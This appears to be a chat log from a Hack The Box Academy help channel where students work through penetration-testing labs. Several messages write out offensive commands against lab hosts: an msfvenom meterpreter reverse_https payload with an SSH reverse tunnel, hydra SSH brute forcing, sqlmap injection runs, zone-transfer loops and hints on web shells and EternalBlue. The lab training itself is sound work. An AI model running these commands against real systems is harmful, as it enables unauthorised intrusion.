polkit-agent-helper-1: pam_authenticate failed: Authentication failure <I am using the provided - HTB@cademy_stdnt! |> <I don't remember if I changed it but if not prompted then I haven't> #1024429874246590575
I was going to buy the student monthly subscription but it won't let me buy it. Who do I need to contact?
for that you need a student email but your college needs to be in the htb list
if it isn't you can contact support to add your college to the htb list
How would I contact support?
there is no responder module?? if you are on the responder box try asking that at #starting-point
there should be a chat bubble on the bottom right of the htb academy page
also if you have adblock on it could block this
so which section are you on?
final section: skills assessment
if you have question about modules then you can just ask it here
and that's question 3 right? I can't remember but I think the question does give you some example extension right? then one of those should work. also I did note down there could be a bug in this, if you can't find anything try restarting the target machine a few times (4 worked for me)
Hi "Skill Assessment - Broken authentication", someone?
sure shoot me a dm
#UPDATE# To get authenticated without the password I was forgetting sudo lol but still seeing "journalctl -u ssh.service --no-pager" "No journal files were found "No entries" so I am assuming that I may have not connected properly
yup 3rd question. will give it another shot with a fresh target, the hint is pretty explicit
so what's your original question and issue again?
There seems to be a problem with the target machine in the skill assessment - website in the module login brute forcing. The IP:port is no longer accessible. I have tried to reset the target multiple times. But nothing seems to work anymore.
password attacks lab - med skills assessment. I have seen a ton of people ask the same question, but no answers, likely to avoid spoilers. Stuck after getting the 2nd user. Thought I knew the way, but it's been 2 days messing with it and no luck. anyone for a ping?
In this case I am trying to access 138.68.164.196:31389. But it's not loading anymore.
i just give it a try and the target seem to be working fine for me
ok this target is dead
Could it be that I am now somehow locked out due to resetting the target too many times or whatnot?
+locked out
if you are then you are the first, but I think nope
try refresh the page and spawn another target
if that still doesn't work you can use my target
Yeah tried that multiple times. Didn't work. But now I have one that seems to work.
if you got 2 users that can login via ||ssh|| hint: check the ||key||
yea I assumed I needed to crack the pw to 1 like it was in the module. but that doesn't work, been reading about other possibilities. not sure what else to even try
also you mean the user that starts with a ||d|| right?
yes, looked thoroughly through what they have done, and have available to them. seemed like it just needed to crack the key - but no go
I could actually use some help with this skill assessment. I have adjusted the url, failed string and login parameters accordingly, tried all the members of the gates family and user, also tried rockyou, incl rockyou<number>, but i can not get the credentials. Been pulling my hair out for the last few hours on this one.
shoot me a dm on the what issue you are having, it should be straightforward with john
for the wordlist you can just use rockyou and the main thing about this one and is the failed string and login parameters
found it, thx. FWIW i made it faster by trimming the dirlist down to the first 10k entries
Got it, thanks. From the forum i understood i had to use rockyou5, 10 or 15. But that obviously was incorrect. Got it now. Hint: Hogwarts Legacy!
module:Using CrackMapExec
Skill Assessment
Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.
I need some help, I can't find any more accounts to get access to sql01, can u give me some hints
Hello, I haven't been successful at completing sqlmap case 8.
I've tried the following commands:
sqlmap -r request.txt --csrf-url= http://161.35.41.48:30009/case8.php --csrf-token= S56J2VYC34zZPyLxHMQRLHjUWUdX8sRzRMnHY8COnw --cookie=q57abl4kklnsb1psr6565o4bdk
sqlmap -r request.txt --csrf-url= http://161.35.41.48:30009/case8.php --csrf-token= S56J2VYC34zZPyLxHMQRLHjUWUdX8sRzRMnHY8COnw --batch --dump -v 3 --level 5 --risk 3 --cookie=q57abl4kklnsb1psr6565o4bdk
Can someone provide me a hint or nudge me in the right direction?
dm
hey guys, I know my question isn't really all that interesting and maybe it's something stupid easy but I just can't seem to figure it out. if someone, anyone can please dm me that would be great. until then, SoloLearn since it's a bit more noob friendly. I already paid over 500 into HTB so backing out is not an option. For more info on question topic etc.. see the most previous post from me
what?
PIVOTING, TUNNELING AND PORT FORWARDING. I'm on the last question, where I need to get the flag from the Domain Controller, I think I already have the IP of the machine but I cannot manage to have access. I'm using netsh on the 2nd and the 3rd machine to get access to the Domain Controller (the 4th machine). It is possible that I am doing more than I'm supposed to hahaha, I'm missing something. any help is appreciated guys
It looks like your command ran fine and the service just wasn't logging anything. You can continue on with the module. Also, if you are using pwnbox the password for your user is in the credentials file on the desktop if it asks you for it again in the future.
pro tip: fill out all of the fields in mstsc.exe
hey guys, I'm new so I have no idea how to hack, I'm here to learn so can anyone help me with what I have to do first, that would be great, thanks to y'all!
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
this channel is for academy module discussion only
Try the pentest process module under the pentesting path. Should be a decent start
Hi, could someone help me with the password cracking module? If I use hashcat on the resource password list with the provided custom rules I end up with >90000 passwords. After 2 hours the machine and target timeout, but Hydra or CME are still running. This is the third time I've waited 1.5+ hrs for a nothing burger. I must be doing something wrong.
sorry, where do I have to ask those questions
DM me
which service are you targeting
SSH
wrong answer
"Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer." this is the question
ssh is super slow to brute you basically never want to target it for cracking like that
I know what the question is. It's lying to you.
I use hydra -l "sam" -P list ssh://targetIP
What?
so I use winrm or smb to crack the pw?
Wow, they could've mentioned that lmao
What service would you suggest? SMB?
teaching you the best way to brute ssh is to brute something else
thats up to you and your enumeration
even the right answer though will still take 30-45 minutes as a heads up
That's alright 😛 I'm used to waiting haha
If you remove all inputs shorter than 7 letters it takes you less than a minute
if you remove the first 17000 or 150000 passwords hydra will get a hit faster
while true, I don't like those cause it's a bit too much "meta" knowledge. Real world you wouldn't arbitrarily do that unless you had extra information to indicate it was a good idea (like pulling the password policy)
I sorted and uniqued the list so I had significantly reduced the keyspace, then I chopped the entire list into 9 different chunks and brute forced each chunk
hydra didn't brute force the password.
not sure what happened there but I checked with grep later and the password was in that list...
I had some weird issues sometimes with brute forcing on my own machine, but it worked in pwnbox, so now every time a module wants me to brute force a large file I just go on pwnbox
Could somebody check in the module PIVOTING, TUNNELING, AND PORT FORWARDING, Section Remote/Reverse Port Forwarding with SSH, if he/she can get a Meterpreter Session Established?
Because I have been trying for 2 or 3 days and it does not work...somehow I believe this is not working for anybody...
AD Enumeration & Attacks - Skills Assessment Part II
Can someone DM me I am stuck on the second to last question trying to get to DC01
InteralIPofPivotHost = 172.16.5.129
ipAddressofTarget = The target that is spawned
is that right?
@timber hatch yes
if you know exploit i would recommend re-visit the section about that exploit
pivot is the one spawned not the target
the target is in the internal network
use netstat to see established connections. Don't just go ahead and copy paste what you see in the module
Thanks I’ll look again
updating the activity log is probably the most annoying thing
yes then your statement "pivot is the one spawned" is simply wrong or misleading....
how?
InteralIPofPivotHost = 172.16.5.129
ipAddressofTarget = The target that is spawned
regarding my question
ok as I remember
you need to get an ip which is the pivot
and then start listening on that ip and attacking the target over it
the subject is pivoting
so they want from you to use the pivot to attack internal network over it
yes that is all clear for me
If someone has completed the CrackMapExec Skill Assessment please hit me up 🙂
how misleading then? Dont get it
everything has it like that
you have a computer
you are connecting to a router
and when you open a website the website gets the ip from the router
so everyone connected to that router has that same ip
but you have another ip in the network so router knows who to send the information
let say your phone also connected to the same router
Look, here are my settings:
Target spawned: 10.129.121.188
msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129-f exe -o backupscript.exe LPORT=8080
scp backupscript.exe ubuntu@10.129.121.188
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.121.188 -v
Here are the Commands regarding HTB:
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InteralIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
scp backupscript.exe ubuntu@<ipAddressofTarget>:~/
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
and what is the problem ?
I still have this error when trying to authenticate using the MSSQL protocol. I tried to specify the domain, but this does not work. Any idea why? ERROR(SQL01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication
meterpreter is doing nothing
well, I haven't done that module. But somehow my cme is broken :(( giving errors all the time. Have you checked that, if yours working in order?
Yes my version of CME is right. I don't think that's the issue.
lol. ok...i have solved it...haha
I had to manually execute the backupscript.exe file at the windows host...I thought somehow this would be triggered with a command above...
never mind...
hahaha
o7 HTB, On Pivoting, Tunneling, and Port Forwarding Skill assessment and have lsasso'd some cred for v*... I'm now stuck figuring out my next move towards the DC....also on another now How do we id a DC in our pentesting context - "from outside peering in"?
Regarding the reverse port forwarding with SSH section in the "pivoting, tunneling and port forwarding" module, why do we have to use the reverse_https payload? I'm not understanding why a meterpreter reverse_tcp payload isn't working (I tried it and got nothing back).
First think about the direction of the port
Then consider why we'd want to encrypt our exfil & infil traffic
Lastly this allows us to somewhat persist post initial connection as well as utilize our attk host directly
As far as non response goes: reset and follow the steps, analyzing each as shown in the lab's pretext
I think that after active directory I am glad that web proxies is next lol. AD was brutal.
I'm having trouble with finding the waldo.txt file in the Finding Files and Folders section of Intro to Windows CMD line
I'm righttttt behind you @.@ I know I'll feel the same way
cmds to try : find / dir / tree
try where /R c:\
💯
what is the error?
whats the error?
Where Object: A positional parameter cannot be found that accepts argument 'waldo.txt'
even if I do it recursively from C drive
should I restart machine?
doing attacking enterprise networks and SQLMap is having a really bad time on ir.inlanefreight.local
see if doing the where /R c:\ *.txt to see if it finds any .txt files
I already tried that fifteen minutes ago
didn't get me results
reset and hold for like 5 mins
try restarting machine; remoting back in; and try again
ok thanks
you can also try doing echo 123 > test.txt and run the where command on the test.txt
to see if it's just being fully weird
ok so I started a new machine and it still didn't give it to me
SQLmap cannot work with this machine, i will have to use regular sql injection
Except I'm getting a proxy error now so I can't even do sql injection
I assume I need to do the where command like where /R C:\Users\ waldo.txt
then get location of file then type:
find "HTB" C:/Users\[file-path-to-waldo.txt]\waldo.txt
but the problem is any variation on the where command isn't working
but am I right about the concept?
just do type C:\path\to\waldo.txt
type will type out the waldo.txt
unless it is specifying using the find command
its specifying find
then yes you would use find "string" C:\path\to\file.txt
move on it seems like this is a common issue
it seems like waldo.txt can be found in another part of the module
ok what's the flag just so I can enter it in? can you dm it to me?
no
ok
you still have to find it yourself
ok
but it sounds like waldo is on a different machine in that module
ya because there's a Flag.txt.txt file that is NOT "waldo" in the C:\ folder and the contents are NOT the flag of this module
so how do I go about finding the flag? any hints based on that?
maybe two VMs were swapped by accident?
my advice: go through the next sections and come back to that question later.
Nvm got it
would like to know why I'm getting "No route to host (Host unreachable)" in Burp Suite against ||monitoring.inlanefreight.local|| in Attacking Enterprise Networks - Web Enumeration & Exploitation
SQLMap was also very slow and getting a lot of 502 responses
the host is up and i can issue commands
hi all
Did you put the ip-> hostname into /etc/hosts?
yes
Hydra question for you experts! (Trying it against Pennyworth in Startingpoint Tier1). "hydra http-form-post -U" lists several optional parameters, one of which I'm interested in:
"2= 302 page forward return codes identify a successful attempt".
Has anyone used/gotten this to work? My string of
"/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError"
is all well and good, but the actual success produces a redirect, and I can't figure out the command line syntax. (BTW I know the username/password, I just want to practice getting hydra syntax correct) Right now the only way I can find the valid username/password is to set "-t 1", number of threads to 1, with -v -V verbose so I can see the redirect response happen right after the candidate username/password attempt.
head to #starting-point
hi why isn't there a lot of tier III and IV stuff? Is more gonna be added soon?
and will tier III and IV stuff ever have job-role or skill paths or be a part of skill paths?
I think that if there were more advanced skill paths that would be sick
I have a question, I am very new to this kind of thing but I have encountered a question on a module quiz that said "find out the machine hardware name". My first answer was amd64 and this was incorrect, so I tried x86_64 and this was correct. My question is why? Are there different amd hardware options that are not x86? I am confused, I tried google but it basically said amd64 and x86_64 are the same thing.
because x86_64 is basically the actual architecture
for instance when I run uname -a on my vm I get a bunch of stuff
but if you look at uname --help it shows that there is a tag -m that is specifically to output the machine name
also if you look at the help command it tells you that uname -a prints out the tags beneath it in that order; omitting the -p and -i if they come back as "unknown"
I see, I think that uname --help is going to be my new best friend. Thanks for helping me get all this lined out!
eh you rarely need to use uname unless you're verifying something or are remoted in and searching for vulnerabilities to exploit
also a HUGE thing to note; with examples sometimes you can't recreate them 1 to 1 in the practice; sometimes they want you to take the knowledge and do some minor abstraction to make it work for your system
exam time
gl :) but I'd say take a few days to go over your notes; rewrite any old notes with new knowledge, etc
like for me my common note for cme smb is ALWAYS ADD --local-auth
that gets me SO MUCH
I feel like I need practice first so I'm gonna drop into the dante prolab and do it as if it's an actual engagement
big tip especially; write your exploit path as you go through and exploit
i noticed that writing the report as you go is a theme
well think about it this way; if you spent 2-3 hours exploiting how likely are you going to remember your initial point of entry
definitely going to practice notetaking and documentation
mhm Do it on live boxes too
I'd say; do dante - reset progress, and using your Documentation, seeing if you can repeat the pwn
sounds good
mind if I DM you about the attacking common services module SQL regarding which wordlist to use? the provided wordlist seems to not yield results
nvm
it seems like hashcat didn't like me :(
but john did :D
module: Attacking Common Services; SQL Database
Cannot seem to login or auth using sqsh in the pwnbox if someone could direct me to what I'm doing wrong that'd be great
Has anyone ever had the "cannot spawn target" error on htb?
@west canopy are you around for this? ;w; because it's lowkey annoying bc my vm is parrotOS...which is having the issues with sqsh ;w;
I'm having issues getting mssqlclient.py to work
unless I'm just entering it wrong; I'm trying to access the mssqlsvc user :) which is where my issue is
but again I'm all for User Error
have you tried with mysql remote host connection command?
and here is where I'm lost LOL feel free to DM me what I may be doing wrong
where exactly are you lost, the syntax or something else?
syntax probably
Restarted my system and now it works.... I hate it here
nice
I figured out what it was I forgot to do -windows-auth :^)
how to find the hostname of a host from its ip in an AD?
as an example I have 3 IPs: 172.16.7.3, 172.16.7.50, 172.16.7.60
how to find out which host is SQL01
cme?
^
open ports?
yeah if you do a script nmap scan doesn't it just flat out tell you?
I did but found nothing, lemme try again
try specifically looking for the SQL ports
linux priv esc makes a nice easier change from AD lol
got it thanks
a lot less moving parts huh
yeh my brain runs out of RAM for a lot of the AD stuff lol
Is there a good way to take notes?
Currently I use obsidian on windows and then Defender starts deleting the file, which is linked with GitLab for backup. But the file keeps getting deleted.
You might want to put exclusion directories for your cybersecurity stuff.
add the filepath you're using to the Defender Exclusion
This ; I figured it out pretty early on so I was able to mitigate note loss; the reason for this is that it is taking some parts of your notes and (rightly) taking it as potentially dangerous :)
Even after adding the DNS to the /etc/hosts file I can't open the website or more specifically the website is very slow and not fully connecting
what module are you working on and section?
I did it but obsidian creates some kind of restore file and Defender starts notifications for viruses found
that is a box then and your question is not related; verify your htb account in #bot-commands and ask in the #boxes channel :) or you might even see that your question has already been answered
Sorry I am new and didn't know where to get help this one was active so texted here
this channel is for modules found on https://academy.hackthebox.com/
and I'm redirecting you to where you'll be able to get your question answered
:)
Thank you
I don't use obsidian but you should be able to trace where it is making the restore file via the virus notification and exclude that location as well.
click on defender and find the filepath that it's deleting and create an exception for that root folder
Yeah, it picks up code blocks and what not. Mainly the well known ones on the internet and from courses. Never really lost notes myself, but it does generate conversations with IT whenever something gets flagged at work.
Mainly temporary storage and experimentation. Wouldn't recommend using your work system for permanent notes or anything you want to keep, the IT group is worse than AV, they will log on to your computer and delete stuff 😅
duh
can anyone help me in COMMAND INJECTIONS Skills Assessment ?
also don't ask to ask; just ask your question that way if you step away and come back it may be answered
where are u at
just try and avoid having spoilers in your post
hey marcie
it avoids having to answer questions like this ^ if you just asked your question you could have had your question answered faster :)
tru
Thank you so much for that, I neeThank you so much for that, I need to know how I ask in a correct way d to know how I ask in correct way
At the beginning, I tried a lot to discover the command injection vulnerability with many characters in the advanced search and the "to" parameter, but unfortunately I could not find the correct character. Is there anyone to guide me? I just need a little hint or clarification to get me going
where are u injecting what
Have you tried everything the module/section has taught you so far?
No idea why, but I'm stuck in a really stupid spot on AD Enumeration & Attacks - Privileged Access.
The last question on leveraging SQLAdmin rights says to 'Authenticate to 10.129.197.111 with user "damundsen" and password "SQL1234!"'... Authenticate how exactly? RDP doesn't make sense, as I need to run mssqlclient.py from my Linux box, and SSH doesn't work. Any pointers?
pivoting is handy
Yes, without use tool
kindly show us the Burp requests you're using
^ unless you are not using burp; in which case - that is why you are unsure where to go
you aren't using a proxy to capture input to see what is being done to it
in content= and ?to= parameters
I have the image, but how can I send it to you?
bro, copy paste it
he can't paste screenshots
he has not verified his htb main account
:)
that is probably the other part of issues
you can paste blocks of code with ``` at the start and end of the code
well, hint, there are other easier injectable endpoints
I don't get it; if you mean the HTB Academy account, I verified it
Gah
- thanks!
Very good, thanks @sly reef
also, start by checking which characters are filtered
By using the same way => &whoami (without encoding the command?)
I will try, thanks @sly reef
Hey
Hey guys, so I'm currently doing some DNS recon (both footprinting and web recon module).
As it stands, I'm doing AXFR (zone transfer) tests one subdomain at a time. Is it possible to dump bulk AXFR requests for a list of subdomains? (e.g. recursive AXFR recon?)
Maybe there is a tool I am missing? Thanks!
Haven't come across a tool for it, but I've used a simple bash script/loop with good success doing bulk AXFRs for a list of subdomains.
E.g., along the lines of for s in $(cat subdomains.txt); do dig axfr $s @x.y.z.w; done
thanks!
Mind explaining this part please?
$s @x.y.z.w; done
$s will be each subdomain from the list. @x.y.z.w you'd replace with whatever DNS resolver IP you want to use, e.g., @10.11.22.33.
so $s represent the s in 'for s' correct?
Yup
is it normal that I can't load the websites from the attacking wordpress module in my browser? curl works fine but if i request it in my browser it hangs
[SOLVED] So for anyone searching for the same thing I was and finding my message, here is an answer:
Get subdomains to a file:
```
dig axfr <domain.xyz> @<domain/IP> | grep '<A>' | cut -d'6' -f1 | uniq > subdomains.txt && cat subdomains.txt
```
Check zone transfer for all subdomains in the file:
```
for s in $(cat subdomains.txt); do dig axfr $s @<domain/IP>; done | grep '<A>' | cut -d'6' -f1 | uniq > RecSubdomains.txt && cat RecSubdomains.txt
```
yeah but it's ok I've figured it out
glad I'd done the Attacking Common Apps module before the Linux Priv Esc skills assessment LOL
lol I'm having some issues with the SMTP one xD but that's probably just me being dumb
mind if I DM you regarding the smtp section of the attacking common services? I feel like I'm losing my mind on it
I've just gone away from keyboard, will chat to you tomorrow about it
ok I'll dm you one of the commands i've tried if you can let me know if I'm on the right track when you can that'd be great lol I'm about to take a step away too LOL
Yep sounds good, sometimes the best thing to do is take a break
anyone? 
Hey guys, I've been doing the Password Attacks module, Password Mutations section, and I've created a mutated list with the 'sort -u' option, and it's taking hours to brute-force the SSH. Maybe there's a faster solution?
- nope, you need to use the same method you used to get the answer for question 2, just this time you need the hash, not the password
- for this you need to login via ||mssql|| and get the flag
- a shell is a shell, you can do whatever you want with it, and it's at /uploads/antak.aspx
thanks
ohh i did chisel and used ||sqsh|| 😅 for Q2 ty ty
if your decoded cookie starts with an X then I think you didn't decode it 100%; hint: use CyberChef
remove the first 17000 passwords
Hello.. I'm taking the Windows Fundamentals module, but when I try to connect with xfreerdp, the login connection is refused. Need your help please..
Hello guys,
Can anyone give me some hints about "Web Service & API Attacks - Skills Assessment"?
I read the forum answers but I didn't get it
Hi, I'm stuck on AD Enumeration & Attacks - Skills Assessment Part I
Q3 Crack the account's password. Submit the cleartext value.
basically I am following the steps in Kerberoasting - from Windows
but every time I run kirbi2john I get a blank crack_file
How far have you got into it? Do you have a shell?
I tried the wsdler on burp but that doesn't help me
So I'm stuck at the beginning, when I tried examining the WSDL file
Hello good people and fellow folks, I come with a question. Recently I have started the HTTP module and literally could not progress since the entire first question is unclear to me. It asks me to retrieve the flag but...how? I tried every command I found in the description/explanation. Link to the module: https://academy.hackthebox.com/module/35/section/219
I would appreciate all help.
Hey @vital adder, I'm stuck on the Common Services module; SMTP. I'm supposed to use the provided password list, right? Not sure which service I'm meant to go after though... (or if I'm even running the right command)
thanks dude you are a legend
saved me like an hour
Hey did anyone complete shells and payloads host 3??
Yep, did you check the hint?
I see what you did 😂 I did this in a similar but rather funny way lol
||dig axfr inlanefreight.htb @10.129.248.78 | grep .htb | sed '/; <</d' | sed '/SOA/d' | cut -d ' ' -f 1 | cut -d ' ' -f1 > axfr.txt && for i in $(cat axfr.txt); do echo "\nRESULTS FOR $i: \n" && dig axfr $i @10.129.248.78; done||
Hope this helps too.
you might want to try a brute forcing tool
for the wordlist, yep, you need to use the given one, and for the server the hint is the section name
the hint is to use EternalBlue but it is not working
Back in the SOAPAction Spoofing section there was a python script that will get you a shell
So I'm meant to brute that port not the other mail protocols on that port yeah?
the hint is to use EternalBlue but it is not working
And using the sneaky port
Did you set the LHOST properly
that method works but I would say it's unintended; based on that you can change it from an exploit to a login request and finally do an SQL injection
if the exploit doesn't work, try the module that lets you run 1 command (||ms17_010_command||)
I'm using pwn box to connect, so they are already set
Always good to double check if it's set or needs to be set
Also
thats a good hint
I tried it; when I'm trying to read the content using type it is asking for admin privileges
You should be using the provided host to attack the systems
Yes, I got a shell using .aspx file and also executed single commands using the exploit
but they are not helping me to read the file
did you get my point?
You said pwnbox so are you connected to the system @ 10.129.x.x
And attacking from there?
Or just using the browser
That is my confusion here
On the 3rd host you don't need to upload a shell
You can get system shell via exploit in the hint
msf will help
I just redid it and everything worked
^
I used Pwnbox, used RDP to connect to the host as per the requirement, and attacked the system from that machine
I tried every Blue vulnerability that was released in 2017, it didn't work.
which one did you use?
I tried for bind shells, reverse shells none worked
and what was the lhost you provided? did it start with 172...?
LHOST is the Pwnbox IP and RHOST is the target, 172.16.1.13 in my case
used EternalRomance, EternalBlue, DoublePulsar
I tried it, but I will try
once again
make sure to use the correct LHOST, check ifconfig and use the one which starts with 172
Lhost? I thought Rhost should be 172??
LHOST too, you need to enter LHOST of the machine you rdp to
but it's not the same as rhost
okay mate, I will give a try and get back to you. give me 5 minutes
sure
the correct IP is the one on the ens224 interface when you run ifconfig
this happens because you can only interact with the target via the internal network
this helped me, thanks mate. I was using the spawn IP address
Finally I got it, thank you...
no problem!
#cwes #WebRequests #POST
Hello everyone,
I cant move on till i understand how to do this method so can somebody please help me.
I am trying to get authenticated using the cookie inside the devtools but I don't know why it isn't working.
I go over to the Storage tab and enter the correct cookie name with the cookie value, then I hit refresh on the webpage and nothing happens. What am I doing wrong???
I followed these instructions >> " Now, let's try to use our earlier authenticated cookie, and see if we do get in without needing to provide our credentials. To do so, we can simply replace the cookie value with our own. Otherwise, we can right-click on the cookie and select Delete All, and then click on the + icon to add a new cookie. After that, we need to enter the cookie name, which is the part before the = (PHPSESSID), and then the cookie value, which is the part after the = (c1nsa6op7vtk7kdis7bcnbadf1). Then, once our cookie is set, we can refresh the page, and we will see that we do indeed get authenticated without needing to login, simply by using an authenticated cookie: "
Man, I am all messed up in the Active Subdomain Enumeration one about zone transfers... I can't even ping the machine it wants for the fully qualified domain name, let alone get nslookup to stop printing out the freaking IP address backwards
I don't think you can ping any of them besides the spawned VM
Did you connect to openvpn?
Yeah openvpn is connected
I just gave it a try and it's working fine for me; after I log out I can just use the old PHPSESSID cookie value to log in without any creds
crackmapexec doesn't have a method to output stuff into a file, and the > should work, but this is basically dumping everything into a file, so if you have verbose on it would be kinda hell
all the subdomain IPs are dead
nslookup 10.10.34.136 returns server can't find 136.34.10.10.in-addr.arpa: NXDOMAIN
yeah, you can't ping that
In the Pivoting, Tunneling and Port Forwarding module, shouldn't this be RPORT?
@unreal crescent if you add the target machine's IP to your hosts file with a domain name you can still ping that domain, but all the subdomain IPs are dead, so it's recommended to use a tool like nslookup for live subdomains
